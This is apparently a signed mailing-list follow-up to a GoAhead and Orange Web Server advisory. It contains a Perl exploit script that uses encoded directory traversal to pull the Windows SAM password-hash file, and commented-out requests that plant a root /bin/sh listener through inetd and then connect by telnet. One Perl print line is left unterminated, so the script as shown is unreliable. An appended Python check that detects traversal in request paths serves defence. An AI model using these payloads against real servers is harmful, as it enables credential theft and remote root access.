-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Have been aware for some time and I just wanted to add a little to Mr. Moore's observations:

Title: GoAhead Web Server Directory Traversal + Cross Site Scripting
> Also Affected: Orange Web Server - all versions

Risk Rating: Medium
> escalated to risk: high - password hash pilfer via 300 year old
> traversal technique

Software: GoAhead Web Server v2.1
< added Orange Web Server - All
< "Orange Web Server uses GoAhead WebServer 2.1 technology so it is
< powerful and stable." - nuff said

Platforms: Windows NT/98/95/CE, Embedded Linux, Linux, QNX, Novell Netware + others
< ADDED: Hard Hat Linux - started bundling GoAhead with their distros, so there should be palm
< pilots, cellphones and all kinds of nifty prototype devices
< running this sad-ware

#!/usr/bin/perl
# spawns a shell on port 10101

use IO::Socket;

if (@ARGV < 1) {
    print "usage: perl go-orange.pl [host]\n";
    exit;
}

$host = $ARGV[0];

$shell = IO::Socket::INET->new(
    PeerAddr => "$host",
    PeerPort => "80",
    Proto    => "tcp") || die "Connection failed.\n";

# dump sam is success on Orange and GoAhead! - was able to jump around
# and do interesting things with encoding 0-day
# %77innt/s%79s%74em%332/%63%6D%64.%65x%65?/c%25%32%30ech%6F%%320W%65
print $shell "GET /..%5C..%5C..%5C..%5C..%5C..%5C/winnt/repair/sam

##################################################################
# commented out hypothetical embedded webserver in transmeta-maytag
# stove scenario. Will leave hand held device (game boy) format vuln
# testing to experts at Non-profit .org's
# Only testbeds I saw were win32 (I only looked for 10 minutes)
#print $shell "GET
#/..%5C..%5C..%5C..%5C..%5C..%5C/bin/echo%20\"10101%20stream%20tcp%2
#0nowait%20root%20/bin/sh%20-i\"%20>>%20/tmp/inet|
#HTTP/1.0\n\n";
# we get signal again
#$shell = IO::Socket::INET->new( PeerAddr=>"$host",
#PeerPort=>"80",
#Proto=>"tcp") || die "fuq, we no get signal.\n";
#print $shell "GET
#/..%5C..%5C..%5C..%5C..%5C..%5C/usr/sbin/inetd%20/tmp/inet|
#HTTP/1.0\n\n";

sleep 1;
print "handheld haqrz connect to $host on port 10101...";
system("telnet $host 10101");

- - xile
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com
-----END PGP SIGNATURE-----
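Added example, not from xile's post or from GoAhead: a Python check that canonicalises a request target the way a hardened server should before it maps the path to a file (fold %5C backslashes to slashes, peel repeated percent-encoding, resolve ".." segments) and reports whether the path climbed above the document root. The sample request lines are constructed; the first reuses the traversal path quoted in the post, the second is a double-encoded variant.

```python
# Added example (not the post's code): canonicalise an HTTP request target
# so that %5C backslashes and nested percent-encoding (%25%32%30 -> %20)
# cannot smuggle ".." past a naive string check.
import re
from urllib.parse import unquote

MAX_DECODE_ROUNDS = 3  # bound on repeated percent-decoding

REQUEST_LINE = re.compile(r"^(GET|HEAD|POST)\s+(\S+)(?:\s+HTTP/\d\.\d)?\s*$")


def canonical_path(raw_target):
    """Return (path, escaped): the resolved path and whether any '..'
    tried to climb above the document root."""
    path = raw_target.split("?", 1)[0]          # drop the query string
    for _ in range(MAX_DECODE_ROUNDS):          # peel nested encodings
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    path = path.replace("\\", "/")              # Windows servers accept both
    stack, escaped = [], False
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if stack:
                stack.pop()
            else:
                escaped = True                  # climbed past the root
            continue
        stack.append(seg)
    return "/" + "/".join(stack), escaped


def is_traversal(request_line):
    """True if the request line's target escapes the document root."""
    m = REQUEST_LINE.match(request_line)
    if not m:
        return False
    return canonical_path(m.group(2))[1]


if __name__ == "__main__":
    samples = [  # constructed sample request lines
        "GET /..%5C..%5C..%5C..%5C..%5C..%5C/winnt/repair/sam HTTP/1.0",
        "GET /%252e%252e%5Cwinnt/repair/sam HTTP/1.0",
        "GET /docs/../index.html HTTP/1.0",
    ]
    for line in samples:
        print(is_traversal(line), canonical_path(line.split()[1]), line)
```

A server itself should normally reject a target that still contains '%' after one decode rather than keep decoding; the bounded loop here suits a log detector that wants to see what the request resolved to.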